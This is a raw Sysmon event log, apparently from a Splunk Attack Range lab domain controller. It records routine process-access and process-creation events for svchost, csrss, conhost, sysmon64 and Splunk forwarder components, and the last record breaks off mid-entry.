10341000x80000000000000009310Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.826{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-472E-6000-FF04-000000009A01}1852C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009309Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.826{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009308Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.826{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009307Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.826{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009306Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.826{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009305Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.826{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009304Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.826{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009303Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.826{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009302Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.826{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009301Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.826{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009300Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.826{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-472E-6000-FF04-000000009A01}1852C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009299Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.826{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-472E-6000-FF04-000000009A01}1852C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009298Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.827{08A6967A-472E-6000-FF04-000000009A01}1852C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009297Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.295{08A6967A-472E-6000-FE04-000000009A01}47364104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009296Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.154{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-472E-6000-FE04-000000009A01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009295Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.154{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009294Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.154{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009293Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.154{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009292Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.154{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009291Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.154{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009290Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.154{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009289Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.154{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009288Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.154{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009287Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.154{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009286Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.154{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-472E-6000-FE04-000000009A01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009285Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.154{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-472E-6000-FE04-000000009A01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009284Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.155{08A6967A-472E-6000-FE04-000000009A01}4736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009311Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:18.998{08A6967A-472E-6000-FF04-000000009A01}18524988C:\Program 